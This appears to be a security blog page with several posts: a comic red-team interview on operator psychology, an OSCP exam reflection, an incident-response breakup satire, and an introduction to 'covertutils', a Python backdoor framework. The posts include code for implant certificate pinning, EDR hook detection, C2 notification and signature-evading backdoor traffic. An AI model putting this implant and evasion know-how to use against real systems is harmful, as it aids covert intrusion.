Tag: security

Red Team Ops Psychology – an Act in 4 Parts

Disclaimers

  1. This Blog post is for fun. Do not self-diagnose!
  2. Do take it with a grain of salt.
  3. The techniques mentioned here were relevant when I was a Red Team operator. Things might have changed by now!
  4. Non-technical people reading this (for any reason): skip the jargon, check the references! You could analyze any profession in a psychological tongue-in-cheek way too!

Setting: A Hypothetical Job Interview for the role of “Senior Red Team Operator”

Characters:

  • Interviewer
  • Interviewee (John)

Part 1 – The Addiction Part (kind of)

– So John, can you answer me this one question: what really happens when an implant is double-clicked in an assume-breach scenario?

– Of course! Can you give me a hint on what transport the implant is using to reach the C2 server? Is it DNS? HTTPS? Anything fancier?

– Let’s assume it’s HTTPS with Cert Pinning. Are you familiar with that?

– I sure am! So yeah, when the implant is double-clicked it starts a process on the host; it can directly execute the malware code or plant it somewhere to be executed at a later time, like with COM hijacking on Windows. Eventually, maybe after self-decrypting its main components, the malicious code attempts to reach the C2 server. It most probably starts with DNS, resolving the C2 server’s IP address from a Domain Name embedded or calculated in its code. Then it starts a TLS handshake with the C2 server (or a redirector). The C2 server provides a Server Hello TLS message attaching an X.509 Certificate, and the malware checks whether the Certificate matches the “Pin”, a value which is embedded in the code and most of the time is a SHA-2 hash. If all goes well, the rest of the TLS handshake takes place, and this is the point where the Red Team operator used to get a message like “Meterpreter session opened (session N)” but now gets something like “Host called home” or anything along these lines…
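
For the curious, a pin check on the implant side can look roughly like the sketch below – assuming the “Pin” is a SHA-256 (SHA-2) hash of the server’s DER-encoded certificate, with made-up host and pin values; real implants differ in what exactly they pin (some pin only the public key).

import hashlib
import socket
import ssl

C2_HOST = "updates.example.com"  # hypothetical C2 domain
PIN = "0" * 64                   # placeholder for the expected cert's SHA-256 hex digest

def cert_matches_pin(host, port=443):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # the pin is the only thing we trust here,
    ctx.verify_mode = ssl.CERT_NONE  # not the CA store
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der_cert = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der_cert).hexdigest() == PIN

# The implant would only continue the check-in if cert_matches_pin(C2_HOST) is True.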

– That’s a brief but sufficient ans…

– I’m not done! This message is printed to the Red Team operator’s screen through some call which ends up in the drawing system of their GPU, and the screen’s pixels change in a way that symbolizes one of the phrases I just stated. The operator’s eyes then perceive this change and the image goes off to the occipital lobe of their brain for decoding. This happens super fast! Keep in mind I’m skipping a lot of stuff here, like the retina’s conversion from light to electrical signals sent down the Optic Nerve, and the flipped-image trigonometry. I can explain these later if you wish, now…

– I think that’s way more than en…

– So yeah, the image is processed in the Visual Cortex of the brain, the words are, we could say, “parsed” – I’m skipping some stuff here – and then passed to the Middle Temporal Gyrus (or MTG for short) of the Red Team operator’s brain, which makes them realise what the phrases printed by the C2 server mean, and they mean that a shell just called home!

– John, we could skip to the next que…

– That’s actually the best part! Now that the operator realises that they got a shell, one thing happens before everything else related to Lateral Movement, checking if the host is Domain-joined and the rest. The operator’s neuroreceptors get a huge pinch of Dopamine in their midbrain, which effectively does two things: first, it sets the operator in a very good and motivated mood, and second, with the help of Glutamate, it takes note of how exactly they got this shell, making them a better Red Team operator, hence making it more likely that they’ll feel that good again in the future. That might lead to a promotion, leading to even more Dopamine! We could say, at this point, that the Red Team operator is a junkie for shells! Isn’t it amazing?

– This was actually a very weird way to explain a connect-back! I have another question for you: How would you continue if you realized that the phishing campaign you sent didn’t go well?

Part 2 – The Conditioning Part

– Oh, what do you mean? Did we get any HTTP canary, did anyone even open the email? Did we get a shell and it was insta-killed?

– Let’s say you get no shells and none opened your emails. Radio silence kind of thing!

– Oh then, I’d check if the email pretext is good enough. It has to be just urgent and formal enough to push someone towards the wrong decision of clicking the malware. I could talk for hours on the psychological violence of phishing campaigns and the general ethics of the Red Teamer, anyway…

– Let’s assume that with the changed pretext the email gets opened but you’re not getting a shell?

– I’m really glad you are asking me this question! You know, there was this guy called B. F. Skinner, considered the father of Behaviourism, the concept that we, as a species, are animals that form our behaviour mainly through conditioning and our reward system! So this guy…

– John, could we please skip to the technical part now?

– Sure. So I’d get from the Information Gathering phase what kind of AV they’re currently using and try creating AV-bypasses for this specific AV by hand.

– And if you are getting a shell now but it dies on you in seconds?

– So, this Skinner guy made an experiment by putting rats and pigeons in a box. He used conditioning to make them learn to press a button in that box. They learned by being rewarded with food every time they pushed that button. Well, not every time, and that’s exactly the catch! The animals got more conditioned to the button when he didn’t provide food on every button push, but only sometimes!

– John, can you please tell me why the shell dies? I find all these things really interesting but kind of irrelevant!

– The interview is for a Senior role, so I believed I had to explain the full stack. I’ll try to be more brief. My point is that the Red Team operator is getting kind of Skinner-box’d into learning how to land a working shell, by not getting it most of the time, and also by waiting random amounts of time until they get the reward. So, if I had to fix that malware, I’d finally need to write some code!

– Glad to hear that! What kind of code?

– C++ or C#, most probably. The shells often die because some Post Exploitation operation is executed and gets identified, traced and blocked by the Endpoint Protection software on the host. So I’d need to get the same software in a Virtual Machine, run the same malware, do the same Post Exploitation actions and see where and how it gets killed. Then I’d try to either patch the EDR’s DLLs out of the process memory, as some of them work in userland, or change the order of the malware’s syscalls, as these are the ones that tend to be signature’d by EDRs.
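
To give a feel of the “some of them work in userland” part, here is a minimal sketch of a quick hook check one could run in that lab VM – an illustration under assumptions (Windows x64, a handful of hand-picked exports), not the actual patching step: clean Nt* stubs in x64 ntdll start with mov r10, rcx (4C 8B D1), and an inline userland hook typically replaces that with a jump.

import ctypes

ntdll = ctypes.WinDLL("ntdll")

def looks_hooked(func_name):
    # Read the first bytes of the exported stub straight from the loaded ntdll.
    addr = ctypes.cast(getattr(ntdll, func_name), ctypes.c_void_p).value
    prologue = ctypes.string_at(addr, 3)
    return prologue != b"\x4c\x8b\xd1"  # "mov r10, rcx" on a clean x64 stub

for name in ("NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtCreateThreadEx"):
    print(name, "possibly hooked" if looks_hooked(name) else "looks clean")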

– I see. Can you explain how you’d write the code?

– I guess I can! I’d fire up my IDE, most probably VSCode for these languages, and make changes to the original malware. I’d use Git to keep all code changes tidy, maybe a branch per target, and then fail to compile a bunch of times. When the code compiles I’d run the malware on the VM, do the actions and see if it gets killed. If it does, I’d go back to square one and try something else.

– That’s a bit generic but I get your idea.

– This continuous cycle of searching the Windows API docs, coding, compiling, running and getting, or not getting, a reward is the basis of it all. It is a Skinner box as well! I do something and I might get rewarded. This hooks me into trying it more and more, so I’ll eventually manage it! Monkeys could even author Shakespeare exactly this way!

– Your approach is really optimistic John. I like that. It all sounds so based, but in a really absurd way! So there is this question now: how would you get notified when you get a shell?

Part 3 – The Compulsive Part

– This brings me to this other topic! By now, having done so many things for this assessment, I’d totally be obsessed! It has to work, right? I mean, I wordsmith’d the pretext, modified the code, tested rigorously, launched the phishing campaign and all. So every minute I don’t get a connect-back must be painful by now!

– So, would you set up some Slack notification or something?

– There are plenty of ways! I can continuously stare at my screen, waiting for the shell to come. But, as some persistence techniques require a reboot to work, we really have no clue how long it can take to get a shell, or if they’re going to work at all. So most C2s have notification systems, sending Slack or Telegram messages on every new connect-back. I’d use one of those. I could also check the Payload Delivery server logs. I didn’t mention it, but we are totally keeping those! So, every few minutes I’d check my Slack or Telegram or the tail -f of the logs, as I might have missed something when I went to the freezer to get water, or when I went for a smoke.
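
A notifier like that can be a few lines of glue. A minimal sketch, assuming a Slack incoming-webhook URL, a hypothetical C2 log path and a “called home” log line format – none of which are tied to any specific C2:

import json
import time
import urllib.request

WEBHOOK_URL = "https://hooks.slack.com/services/XXX/YYY/ZZZ"  # hypothetical webhook
C2_LOG = "/opt/c2/logs/connections.log"                       # hypothetical log path

def notify(text):
    data = json.dumps({"text": text}).encode()
    req = urllib.request.Request(WEBHOOK_URL, data=data,
                                 headers={"Content-Type": "application/json"})
    urllib.request.urlopen(req)

with open(C2_LOG) as log:
    log.seek(0, 2)  # start at the end of the file, like `tail -f`
    while True:
        line = log.readline()
        if not line:
            time.sleep(2)
            continue
        if "called home" in line.lower():
            notify("New connect-back: " + line.strip())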

– This is a lot of dedication! I like that!

– Probably you shouldn’t. Checking all the time is a part of the job that is not useful and is kind of addictive as well. Like checking socials or messages on your phone all the time. You could even say that this is the compulsion part of an obsession. Because Red Team operators, more often than not, get obsessed with landing in the target organization. It gets very personal. You could argue that it is passion, and sometimes it really is, but I’d say it easily becomes an obsession. And compulsion follows obsession sooner or later! It can loosely be seen as an addiction too!

– Wait, you are saying that Red Teamers have OCD?

– No! You can have Obsession-Compulsion cycles without having OCD, just like you can have narcissistic traits without being a narcissist. The thing is, I believe these cycles make professionals less effective, which is counter-intuitive, but I can explain.

– I don’t know if this is an interview anymore.

– It really is a blog post, but let’s continue pretending for a moment – it’s gonna end soon!

– Ok, go ahead. If this way of working is ineffective, as you say, what is an effective one? To keep the interview format, what new ways would you bring to the Team in case you join?

Part 4 – The Cure for this Profession

– If I join the team I’d work in a very specific way. My way really comes from Buddh…

– I was really afraid we’d end up somewhere like this.

– It’s not a religious belief though. It is about not merging oneself with the outcome. Not valuing myself as a person based on whether I managed to send a piercing phishing campaign or a well-baked payload. It might seem bad at first, but it really relieves me from a lot of the pressure I’d put on myself. Without this pressure and mental overhead I can really, calmly, hack them. My mind’s CPU can stop spending cycles on my self-worth, and I use those cycles to better think of a good spear-phishing target or to craft a solid Malleable Profile.

– This is a very philosophical point of view Jo…

– Thank you, sir!

– I was saying that I appreciate it, but I’d like to ask if there is a more practical example of what value you could add to our team?

– Well, I speak Terraform fluently, as I like the preparation phase. For me, preparation is the best part of an assessment, as the reward cycle hasn’t started yet and so the actions a Team takes are calm and measured. It is when the rewarding phase comes that Red Teamers lose their cool. They log in from home, they do OpSec-unsafe stuff, they run PowerShell hoping not to get caught that one time. And that’s why they fail. These actions are reckless ways to get Dopamine. It’s their midbrain loosely overriding their Frontal Cortex, which knows that Elastic SIEM has a bunch of rules that booby-trap PowerShell, and that DCSyncing from just any Domain Admin user is easily detected.

– Thank you John for your time. We’ll send you an email later today on how we can proceed with the hiring process.

– Really? We just started… We are like 15 minutes in!

References

Addiction Neuroscience 101 – YouTube

The Neurobiology of Addiction Addiction 101 in Olson – YouTube

The Skinner Box – How Games Condition People to Play More – Extra Credits – YouTube

Thoughts on an “Obsessive Simulation of a Critical Procedure”

The Email

A few days ago I got a very weird email:

OSCP mail

I felt like something was very wrong. What’s with the “Professional” word in there (“Offensive Security Certified Professional“)? I don’t feel that professional. Specifically, this XKCD expresses me so well:

lease

 

A professional?

So, as I’m not feeling that professional, this organization must be wrong to call me one. Yet, I actually pwned the machines required to “pass”, and be considered one. So, what am I?

Am I an OSCH (Offensive Security Certified Hobbyist)?

Being an OSCP means that you can do an Internal Penetration Test and deliver some report. While the report requirements are too low (IMHO), the market is full of bad actual Penetration Test reports anyway, so it’s only fair. Yet, does this make you a Professional?

It (at least) makes you a *Professional* at Capture The Flag

The infamous OSCP Lab and the Exam itself are basically CTFs. Nothing more. So, you don’t need to be a professional to play CTFs. I know 16-year-olds that play CTFs. And they think about Batman half the day. Skill-wise, they could most probably earn an OSCP.

But, then, skill is not the only thing needed to earn an OSCP. Far from it…

 

The ingredients of the OSCP recipe

The Exam

Well, knowing computers is the easy part of the OSCP. In case you don’t know the well-known OSCP exam process, it goes as follows (as of 5/19):

  • You have 24 hours
  • You are presented with 5 hosts (Windows or Linux)
    • 25 point host – considered quite difficult
    • 25 point host with BoF – considered a gift from OffSec
    • 2 x 20 point boxes – difficult enough but doable
    • 1 x 10 point box – single remote exploit to root
  • You have to get root or Administrator/SYSTEM on 4 out of 5 boxes – 75/100 points to pass
  • The process is proctored
    • You are being watched and recorded for the whole 24-hour thing
    • Your screen is also watched and recorded
    • You have to write in a chat and get permission to take a break, even for a minute.
  • Metasploit and meterpreter can be used (successfully or not) on only one box.
  • When you finish, you get 24 more non-proctored hours to write a report and send it over to OffSec, with very specific/intimidating rules for packaging it.
  • If you have a report from 10 machines of the Lab and **all** the PDF exercises, you can submit them for 5 more points.

So, which part of this is something that makes you a Professional?

 

Mentality

For me, what made the whole exam a bearable experience that didn’t result in a mental breakdown was handling it Professionally altogether. And by that, I mean cutting it down to its logical proportions, evaluating what the exam actually means for me, my skills and my life in general.

Having been a Professional in Penetration Testing for some years now (without being an OSCP), I’ve learned that there is a possibility that I won’t “hack” my way into some company. It happens. To even the best, and I don’t claim to be one of them. So there is a fair chance that I won’t get the enlightenment needed to get the Privilege Escalation for the 25 point box. Or find the exploit for the 10 point box (which was actually the case for me). And this is not a moment. This can be a 6-hour state of not finding this Privilege Escalation, which keeps you under the 75 passing points.

The ones that can patiently accept their unenlightened selves for 6 hours, falling short of these 75 precious points, while calmly and constantly trying their best to earn them – these are Professionals.

 

Flawed Psychology Fucks People (FP2)

Given the situation of someone having 70 points (just under the passing line) for 6 hours (with the exam finishing in 2 hours), many bad things can cross one’s mind. It vastly depends on one’s background, but for me, problematic parenting (that happened long ago anyway), combined with a bad school environment, some moderate impostor syndrome, and a huge expectation from everyone I know that it’s a piece of cake for me (hence pressure), gave me plenty of triggers for bad thoughts.

Some of them:

  • I’m not enough / I’m not made for this (classic impostor syndrome verse)
  • If I had done the PDF exercises and Lab Report I could have the 5 points that I now miss (pointless regret)
  • “You can’t do it, it’s very difficult” (typical bad-fatherish voice)
  • I’m gonna fail and all my friends will realize that I’m not that good at hacking.
  • I should have studied Windows/Linux Privilege Escalation more. It’s my fault (another pointless regret).
  • If I fail this then I’m not a good hacker. And I haven’t invested in anything as much as hacking.

Continuing to look for the correct Privilege Escalation vector while these thoughts knock on your head’s door is not a simple task. It is not only about not opening the door to them. It is about minimizing them out of existence. About fortifying yourself and allowing yourself to care only as much as needed and no more. Plus, all these thoughts count against your thinking capacity, and you need all of it anyway.

What about the non-stop 24 hours?

There is no direction. It is 24 hours and a .ovpn file. Everything is up to you. You can sleep, eat, go out for beers, go pee every five minutes or get on an LSD trip. If somewhere in there you manage to get 4/5 root flags, and the next day you report it slightly better than a young monkey, you are an OSCP. That’s it. That’s the deal.

So it tests the maturity of your time management skills. Do you get into rabbit-holes a lot? Do you stay in rabbit-holes out of stubbornness over the time you’ve invested in them? Do you have the tendency to procrastinate when you are looking up something on Github? Do you maybe check your phone every X minutes (X < 10)? These things are gonna cost you. They cost in life anyway, but in this 24-hour exam they are gonna cost x100.

 

“Try Harder”

Handling all the above while pwning 4/5 boxes in 24 hours is not easy. This is what makes you a Professional. This is OSCP.

“Try Harder”, the classic OffSec quote, is not about the boxes. It is about fixing the flaws that plague oneself, refining the person as a whole. The challenge could very well be anything else. Yet, it’s no coincidence that the subject of a test that goes so deep into one’s psychology is an IT Security one. It has been well proven that IT Security and Human Psychology are deeply connected. I found somewhere a blog just about that. I think it was called securo-something

Between an Incident Response and a Break-up

Long time again… Sometimes I feel like I am gathering inspiration for too long, and it starts fading after a while.

There is a perfect timing – a sweet spot – for writing a poem or a python package. If you miss it, that’s it, you missed it… You need to gather your inspiration all over again…

It’s been almost a year since my first post (Dating as a form of Penetration Testing). It is time for a break-up parallelization. Here we go!

 

Incident Response as a form of a Break-up

The Setup

Sometimes bad things happen. Those bad things vary in type, but a security incident in a company can be a very bad thing. A Bad-like-Jesse-James thing. A company can lose thousands of $ because of a spear-phishing campaign, or a compromised account on the database server.

A break-up, on the other hand, is a more straightforward thing. You gotta get separated from someone or something beloved (I won’t forget the moment I gave up my ThinkPad for my corporate machine).

For a guy the beloved thing is his girlfriend (or even his boyfriend), for a sysadmin it’s the rootkit‘d File Server (he spent days and mojo building).

And you gotta get separated for sure… The Relationship/Server is no good anymore. It actually does more harm than good.

Going Deeper

Technically speaking, there are several phases, both in an incident response and in a break-up. And if you think about it hard enough, they seem to be the same phases…

SANS documents the Incident Response Phases in the GCIH cert material as follows:

  • Identification
  • Containment
  • Eradication (Cleaning Up)
  • Recovery
  • Lessons Learned

Hell, doesn’t this sound awfully familiar already?

So, let’s shine! Our star tonight: the Separated & Hacked SysAdmin

 

Identification

I don’t actually feel the same way I used to with her. I feel nothing when I touch her… I don’t care if I will be seeing her tonight or not

# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19356 648 ? Ss May20 0:02 /sbin/init
root 2 0.0 0.0 0 0 ? S May20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S May20 0:03 [migration/0]
[...]
root 4108 0.0 0.0 11716 548 ? S May20 0:02 /usr/sbin/.httpd
apache 37008 0.0 0.0 213148 11328 ? S May21 0:04 /usr/sbin/httpd

It is this time! The shivers you get. The mindblow. The spine that tingles a bit. The urge to cry… The realization that you have no tears…

It happened on Monday. It had to be about 19:something. He’d stayed at work late and had to go to her place for the night. The moment he was typing the ps command (for no reason, like every Linux guy who is bored in front of the #), he was thinking of his girlfriend…

He’d stayed late just to have some time alone. Didn’t have work to do. Didn’t need to be at work at all. But, for some reason, he couldn’t get his head around the forthcoming sleepover. It’d be the same thing again. The same meal, the same sex, the same “Calvin and Hobbes” comic in the WC… He wouldn’t do it.

Then he grasped the ps output. He couldn’t actually believe what he was staring at. At first he was like “Hey, my httpd ain’t running as root. I fixed the config two days ago“. And then he went: “what the fuck is this bro?” (he loves PC Principal from South Park).

After the shock he had two phone calls to make. More like three. The first one was to his girlfriend. Talked about the incident. He couldn’t come over… He was somewhat hopeful for this. Somewhat… Sometimes digital forensics are better than sex. But that night… That night anything was better than sex!

And then he called the Incident Response team, and his best friends. Ordered pizza from the office to his home (that makes it four phone calls). Arranged a meeting for the next morning with the Incident Response guys and headed home, where his friends were also heading after the Bromance Alarm.

He had to figure out both issues the following day. How come he can’t see her face in his mind? How was this rogue process planted? He had to get his shit together…

 

Containment

SANS got me on this again! SANS explains the Containment Phase as “to stop the bleeding“. SANS guys must be really experienced with break-ups apart from sleuthkit.

So, the sysadmin guy broke up the next morning. He was the smart type of guy – he didn’t suppress his feelings. He felt like it, so he broke up!

Ironically, he did so over the phone, while the Incident Response guys were unplugging the Ethernet from his server (after gathering live memory dumps of course)…

The containment phase began the same evening. He gathered the gang again and went to a Pub. Got almost wasted with just beers and nachos. Then he introduced himself to a stranger, while his friends were constantly provoking him, like high-schoolers (do we –men– actually ever escape the high-school age?). Told everything to her, while constantly burping like Rick from Rick and Morty.

He knew nothing about what was going to happen next… He knew nothing about the Nightingale Syndrome the woman was under. To make a long story short, after almost crying in her arms, they got pre-laid in the Pub’s WC and completely laid at her place…

She became his “rebound girl” for a while. He slept over at her house for almost a week. He went home only to pick up things like his toothbrush and clothes. Too many memories in there… It was time for…

 

Eradication

Friday night was a bummer. All day Friday at work he was trying to remove the malware from the compromised server. There were also crontabs, services, even a kernel module found by the forensics team…

He kept removing shit and more shit kept spawning. Rogue binaries in /root/bin/ and bogus entries in lsmod output… All day Friday he was removing malware…

Then he got home. A Friday evening. His friends were all busy and he kind of missed his ex.

What follows is often seen in movies and teenage video-clips. He got his zippo and went to the bathroom with all the pictures he had from the previous holidays they did together. He set them on fire in the bathtub. Later he brought presents and all the romance-shit postcards and letters from the Erasmus era. Her old sunglasses, her toothbrush, 3 pairs of socks… He kept burning stuff all night and more kept spawning…

 

Recovery

He spent days burning stuff and drinking Mountain Dew or Dr. Pepper. He also made a new friend – the pizza boy. Gained some weight, stopped going out, missed the NBA finals. He was a mess for some time…

 

Then, suddenly, one morning he woke up motivated! Went for a walk before work, by himself. Did some push-ups before putting his jeans on. It was time to finally recover…

Went to work and rebuilt the whole server. LDAP authentication, public key only authentication on SSH, remote sys-logging, etc.

Then he got home. Cooked a meal for himself, after a long time. Brewed some coffee. Checked out Hacker News from his Android, like he used to, even before he met his ex.

Later that day, he went to the Pub, alone. Got some beer and sat by the window, alone. Nothing happened. No one talked to him and he talked to no one. He did some thinking, all by himself.

Before going to bed, ’round midnight, he remembered he loved Kerouac and Burroughs. Their books were on the shelf collecting dust for too long. It had been years since he last read his favorite books. Goddammit, what had happened to him…

Fell asleep while reading Junky, feeling nostalgic. It was the first day of the rest of his life…

 

Lessons Learned

He went to work earlier that morning. Determined. Whatever fucked that server up wouldn’t happen again. At least not without him noticing.

Utilized syslog everywhere. Everywhere! Even on the coffee machine. Spent countless hours setting up Kibana, added Suricata to the firewall appliance and FINALLY created VLANs!

The thing went personal. This was not just his company’s network, it was his personal fortress

 

He stayed up late at work, and when he got home, he got a beer and did some more thinking. Why did he abandon everything while being with his ex-girlfriend? Why did he give up all the music he used to like? His favorite books? His friends? His role as linux-guru sys-admin?

He felt a bit desperate about why he left everything for her. He couldn’t understand why he lost the best bits of himself just by being with her… He wouldn’t do that again.

The thing went personal. He was not just a body and soul looking forward to mate again, he was his personal fortress

 

 

 

Highly inspired by “How To Break Up” – Tales Of Mere Existence – and my life.

Thanks for reading my 12th article.

 

 

 

Reinventing the Wheel for the last time. The “covertutils” package.

 

The motivation

These last months I came across several Github projects with RAT utilities, reverse shells, DNS shells, ICMP shells, anti-DLP mechanisms, covert channels and more. Researching other people’s code gave me the ideas below:

Those things have to support at least an encryption scheme, some way of chunking and reassembling data, maybe compression, networking, error recovery. (Not to mention working-hours operation – Empire agent, certificate pinning – meterpreter, and unit identification – pupyRAT.)

And they all do! Their authors spent days trying to recreate the chunking for the AES Scheme, find a way to parse the Domain name from the exfiltrating DNS request, recalculate IP packet checksums and pack them back in place, etc…

And then it got me. A breeze of productivity. That crazy train of creation stopped just before my toenails. The door opened…

What about a framework that would handle all those by itself?

A framework that would be configurable enough to create everything from a TCP reverse shell, to a Pozzo & Lucky implementation.

A framework without external dependencies – not even the most stable ones – that uses only Python built-ins.

And all those without even thinking of encryption, message identification, channel password protections and that stuff we hate to code.

Then I started coding. Easter found me coding. Then Easter ended and I was still coding. Then I didn’t like my repo and deleted it altogether. I recreated it and did some more coding. Spent a day trying to support Python 3 and gave up after 10 hours of frustrated coding.

And finally it started working. The “covertutils” package was born. A proud python package! And here it is for your amusement:

https://github.com/operatorequals/covertutils

And here are the docs:

https://covertutils.readthedocs.io

Let’s get to it…

 

Basic Terminology of a backdoor

So let’s break down a common backdoor payload. In a backdoor we have mainly two sides. The one that is backdoored and the one that uses the backdoor.

The host that is backdoored typically runs a process that gives unauthorized access to something (typically an OS shell). This process, and the executable (binary or shellcode) that started it, is the “Agent“.

The host that takes control of the backdoored machine typically does so using a program that interacts with the Agent in a specific way. This program is the “Handler” (from exploit/multi/handler anyone?)

Those two have to be completely compatible for the backdoor to work. Notice how Metasploit’s exploit/multi/handler asks for the payload that has been run on the remote host, just so it knows how to treat the incoming connection. Is it a reverse_tcp VNC? A stageless reverse_tcp meterpreter?

Examining the similarities of those two (agents and handlers) helped me structure a python API, that is abstract, easy to learn, and configurable.

 

The covertutils API

All inner mechanics of the package end up in 2 major entities:

  • Handlers
    Which are abstract classes that model Backdoor Agent’s and Handler’s behavior (beaconing, silent execution, connect-back, etc).

    Attention passengers: The Handler classes are used to create both Agents and Handlers.

  • Orchestrators
    Which prepare the data that has to travel around. Encryption, chunking, steganography, are handled here.

With a proper combination of those two, a very-wide range of Backdoor Agents can be created. Everything from simple bind shells, to reverse HTTPS shells, and from ICMP shells to Pozzo & Lucky and other stego shells.

 

The data that is transferred is also modeled in three entities:

  • Messages
    Which are the exact things that an agent has to say to a handler and vice-versa.
  • Streams
    Arbitrary names, which are tags that inform the receiver of a specific meaning of the message. Think of them almost like meterpreter channels, with the only difference that they are permanent.
  • Chunks
    Which are segmented data. They retain their Stream information though. When reassembled (using a Chunker instance) they return a (Stream, Message) tuple.

The Orchestrator

Orchestrators can be described as the “objects that decide what is gonna fly through the channel“. They transform messages and streams to raw data chunks. Generally they operate as follows:

orchestrator.png

The chunks can then be decoded to the original message and stream by a compatible Orchestrator instance. They are designed to produce no duplicate output! Meaning that all bytes exported from this operation seem random to an observer (one that doesn’t have a compatible Orchestrator instance available). This feature exists to avoid any kind of signature creation for the created backdoors, when their data travels around networks…

The code that actually is needed for all this magic is the following:

>>> message = "find / -perm -4000 2>/dev/null"
>>> sorch = SimpleOrchestrator("Pa55w0rd!", streams = ['main'])
>>> chunks = sorch.readyMessage( message, 'main' )
>>> 
>>> for chunk in chunks :
...     print chunk.encode('hex')
... 
a3794050e26ad5935a1c
179083d79cad047be0a7
eb8bb3340b73ddc5eedb
af82b3a2a0f913a37a2f
3b0ddf0f365973dd4ae3
>>>

And to decode all this:

>>> sorch2 = SimpleOrchestrator("Pa55w0rd!", streams = ['main'], reverse = True)
>>> 
>>> for c in chunks :
...     stream, message = sorch2.depositChunk( c )
... 
>>> stream, message
('main', 'find / -perm -4000 2>/dev/null')
  • Note the reverse = True argument! It is used to create the compatible Orchestrator. Two identical objects are not compatible due to the duplex OTP encryption channel.

 

The Handler

Handler‘s basic stuff is declared in an Abstract Base Class, called BaseHandler. There, 3 abstract functions are declared, to be implemented in every non-abstract subclass:

  • onMessage
  • onChunk
  • onNotRecognised

When data arrives at a Handler object, it uses the passed Orchestrator object (Handlers get initialized with an Orchestrator object) to try to translate it into a chunk. If it succeeds, the onChunk(stream, message) method will be run. If the received data can’t be translated into a chunk, then onNotRecognised() will run.
Finally, if the raw data is successfully translated, the Orchestrator will assemble the actual message when its last chunk is received. The onMessage(stream, message) method is run when a message is fully assembled.
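
To make the callback flow concrete, here is a minimal sketch of a Handler subclass based only on the three abstract methods described above; the import path and the way the object gets wired to an Orchestrator and a transport are assumptions, so check the docs for the exact signatures.

from covertutils.handlers import BaseHandler  # assumed import path

class PrintingHandler(BaseHandler):

    def onChunk(self, stream, message):
        # Runs for every recognized chunk; 'message' is only complete
        # once the last chunk of it has arrived.
        print("[*] Got a chunk on stream '%s'" % stream)

    def onMessage(self, stream, message):
        # Runs once a full message has been reassembled by the Orchestrator.
        print("[+] Stream '%s' says: %s" % (stream, message))

    def onNotRecognised(self):
        # Runs for received data that can't be matched to any stream.
        print("[-] Data not recognised - ignoring")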

The combined idea of a backdoor can be seen in the following image (fullscreen might be needed):

covertutilsbasicbackdoor.png

 

The Internals

How Streams are implemented

The Idea

Data needs to be tagged with a constant for the handler to understand that it is meant to consume it, as a handler may receive data that is irrelevant, not sent from the agent, etc…

The problems in this idea are several. Bypassing them created the concept of the stream.

First of all, the constant has to be in a specific location in the data, for the handler to know where to search for it. That brings us to the second thing:

If a constant is located at a specific data offset, it defines a pattern. And a pattern can be identified. Then escalated to analysts. Then blacklisted. Then publicly reported and blocked by public anti-virus products.

So for the tagging idea to work well, we mustn’t use a constant. Yet the handler has to understand a pattern (that can’t be understood by analysts). Considering that both the Agent and Handler share a secret (for encryption), the solution is a Cycling Algorithm!

The StreamIdentifier Class

When sharing a secret, infinite secrets are shared. If the secret is pa55phra53 then we share SHA512(“pa55phra53“) too. And MD5(“pa55phra53“). And SHA512(SHA512(“pa55phra53“)). And MD5(SHA512(“pa55phra53“+”1”)). You get the idea.

So the StreamIdentifier uses this concept to create tags that are non-repetitive and non-guessable. It uses the shared secret as seed to generate a hash (the StandardCyclingAlgorithm is used by default, a homebrew, non-secure hasher) and returns the first few bytes as the tag.

When those bytes have to be recognized by a handler, the StreamIdentifier object of the handler will create the same hash, and do the comparison.

The catch is that when another data chunk has to be sent, the StreamIdentifier object will use the last created hash as seed to produce the new tag bytes. That makes the data-tag a variable value, as it is always produced from the previous tag used plus the secret.

A sequence of such tags is called a Stream.
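
To illustrate the cycling idea, here is a toy version – not the real StreamIdentifier, which uses its own homebrew StandardCyclingAlgorithm instead of SHA-512:

import hashlib

SECRET = b"pa55phra53"
TAG_LEN = 2  # the default tag size mentioned below

def next_tag(previous):
    # Every new tag is derived from the previous tag plus the shared secret,
    # so it never repeats, yet both sides can compute it independently.
    return hashlib.sha512(previous + SECRET).digest()[:TAG_LEN]

tag = next_tag(SECRET)  # first tag of the stream, seeded by the secret itself
for _ in range(5):
    print(tag.hex())
    tag = next_tag(tag)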

Multiple Streams

Nothing stops the implementation from having multiple streams (in fact there is a probability pitfall, explained below…)! So instead of starting from “pa55phra53” and generating a single sequence of, let’s say, 2-byte tags, we can start from “pa55phra531”, “pa55phra532”, “pa55phra533”… and create several such sequences (streams).

The StreamIdentifier will not only identify that the data is consumable, but will also identify whether a tag has been produced from “pa55phra531” or from “pa55phra533”. This can be used to add context to the data. Say:

  • Everything produced from “pa55phra531” will be for Agent Operation Control (killswitch, mute, crypto rekeying, etc)
  • Everything produced from “pa55phra532” will be run on an OS shell
  • Everything produced from “pa55phra533” will be shellcode that has to be forked and run
  • And so on…

Now the messages themselves do not need to follow a specific protocol, like:

shell:uname -a
asm:<raw /bin/sh execve shellcode bytes>
control:mute

they can be raw (saving bytes on the way), relying on the stream for delivering the context (when writing a RAT-like agent several features have to be implemented, and streams come in handy with this).

The streams are named with user-defined strings (e.g “shell”, “control”, etc) to help the developer.

 

The Pitfall

Tags have to be small. They shouldn’t eat too much of the bandwidth. They are like protocol headers in a way. Not so small that they can be guessed or randomly produced by a non-agent, not so big that they become a large part of the raw data.

When implementing a ton of features using streams (say 8 features), using a 2-byte tag (the default) creates a small chance of collision. Specifically a 1/2341 chance (still more probable than finding a shiny pokemon in Pokemon Silver – 1/8192).
And to make things worse: this chance is not for the whole session, but per sent chunk (as tags cycle for every chunk), so it is quite high!
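
A quick sanity check of that 1/2341 figure, under the simplifying assumption that each cycle’s 8 tags behave like independent uniform 2-byte values: the chance that at least two streams land on the same tag is roughly the birthday bound C(8,2)/2^16.

from math import comb  # Python 3.8+

streams, tag_space = 8, 2 ** 16   # 8 features, 2-byte tags
p = comb(streams, 2) / tag_space  # 28 / 65536
print(p, 1 / p)                   # ~0.000427, i.e. about 1 in 2341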

The Solution

Well, maths got us down. For that many features, one more byte (3-byte tags) will minimize the chances tremendously. There is also an option to make the tags constant. That way the above chance counts for the whole session, making a collision quite unlikely.

 

Handler Types

